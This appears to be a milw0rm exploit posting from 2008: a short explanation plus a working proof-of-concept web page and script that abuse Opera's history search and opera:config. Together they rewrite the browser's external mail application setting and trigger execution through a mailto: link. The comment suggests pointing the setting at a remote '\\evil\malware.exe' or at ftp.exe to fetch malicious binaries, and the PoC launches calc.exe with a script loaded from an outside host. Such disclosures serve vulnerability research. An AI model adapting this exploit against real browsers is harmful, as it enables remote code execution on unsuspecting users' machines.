45 lines
No EOL
1.5 KiB
HTML
45 lines
No EOL
1.5 KiB
HTML
<!--
|
||
Just found a way to use Stefano’s opera:config idea to execute code from remote.
|
||
|
||
Instead of changing the HTTP Proxy, an attacker can change the default external
|
||
mail application to “\\evil\malware.exe â€, or to local commands (e.g. ftp.exe
|
||
which can be used to download malicious binaries from remote). Also, there is a
|
||
need to change the “Mail Handler†settings to “2â€, so opera will execute the
|
||
external mail application, instead of the default opera mail application.
|
||
|
||
After changing the settings, the attacker can simply set the location to “mailto:†to execute the code.
|
||
|
||
|
||
A proof-of-concept which executes the Windows Calculator can be found here: http://raffon.net/research/opera/history/op.html
|
||
|
||
|
||
Cheers,
|
||
|
||
--Aviv.
|
||
|
||
http://aviv.raffon.net
|
||
-->
|
||
|
||
<html>
|
||
<title>bb</title>
|
||
<script>
|
||
var z=null;
|
||
function x() {
|
||
window.setTimeout("z=window.open('opera:historysearch?q=%2A');window.focus();",1500);
|
||
window.setTimeout("z.close();",3000);
|
||
window.setTimeout("location.href='mailto:'",3000);
|
||
}
|
||
</script>
|
||
<body>
|
||
<a href="#<script src='http://www.raffon.net/research/opera/history/o.js'></script>" onclick="x()">Click me...</a>
|
||
</body>
|
||
</html>
|
||
|
||
<o.js>
|
||
s=document.createElement("IFRAME");
|
||
s.src="opera:config";
|
||
document.body.appendChild(s);
|
||
s.src="javascript:opera.setPreference('Mail','External Application','c:\\\\windows\\\\system32\\\\calc.exe');opera.setPreference('Mail','Handler','2');parent.window.close()";
|
||
</o.js>
|
||
|
||
# milw0rm.com [2008-10-23] |